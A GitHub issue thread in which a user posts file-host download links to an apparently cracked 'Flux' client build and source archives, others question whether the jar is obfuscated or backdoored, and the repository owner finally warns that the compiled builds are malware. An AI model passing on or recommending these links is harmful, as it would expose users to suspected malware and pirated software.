### ISSUE TITLE
Download Runnable Build here

### ISSUE THREAD

**Issue by ghost** [jeremypelletier/flux-opensource#10]
https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file
https://workupload.com/file/G7hgcAc5jjD

eclipse ready:
https://www.mediafire.com/file/c7w6296nln1vk38/src.zip/file
http://www.mediafire.com/file/8mob1go58pgwm8p/lib.zip

**Comment by JustLegitMC** [comment]
Thx some times java jdk glitchy

**Comment by Altf4lol** [comment]
safe?

**Comment by 64John** [comment]
> safe?

The jar not obfuscated. And at the same time u could build it yourself

**Comment by redvx** [comment]
Its obfuscated lol

**Comment by 64John** [comment]
> Its obfuscated lol
> 
> com.fasterxml.jackson.databind.util.TokenBuffer
> 
> looks kinda ratted 😳

Just delete that package. It's from original Flux.jar (their IRC client)
i put i into here for dependence issue.(Build Runnable file need to satisfy the need library)
The full source code was provided. So you can just build yourself if u don't trust.

**Comment by FartCheese** [comment]
> Its obfuscated lol
> 
> com.fasterxml.jackson.databind.util.TokenBuffer
> 
> looks kinda ratted flushed

Utility class used for efficient storage of [JsonToken](http://fasterxml.github.com/jackson-core/javadoc/2.7/com/fasterxml/jackson/core/JsonToken.html?is-external=true) sequences, needed for temporary buffering. Space efficient for different sequence lengths (especially so for smaller ones; but not significantly less efficient for larger), highly efficient for linear iteration and appending. Implemented as segmented/chunked linked list of tokens; only modifications are via appends.

Note that before version 2.0, this class was located in the "core" bundle, not data-binding; but since it was only used by data binding, was moved here to reduce size of core package

**Comment by VozyNTR** [comment]
> https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file https://workupload.com/file/G7hgcAc5jjD
> 
> eclipse ready: https://www.mediafire.com/file/c7w6296nln1vk38/src.zip/file http://www.mediafire.com/file/8mob1go58pgwm8p/lib.zip

hi bro thanks you for this but when i import the project in intellij idea , i have so many missing import 
i already imported all your lib

**Comment by 785yyy** [comment]
> > https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file https://workupload.com/file/G7hgcAc5jjD
> > eclipse ready: https://www.mediafire.com/file/c7w6296nln1vk38/src.zip/file http://www.mediafire.com/file/8mob1go58pgwm8p/lib.zip
> 
> hi bro thanks you for this but when i import the project in intellij idea , i have so many missing import i already imported all your lib

You need to install lombok plugin.

**Comment by VozyNTR** [comment]
Can you explain me in discord @Kanhens ? did you get this src works without any errors ?

**Comment by jeremypelletier** [comment]
The only "compiled" fluxs so far are malware. DO NOT DOWNLOAD.
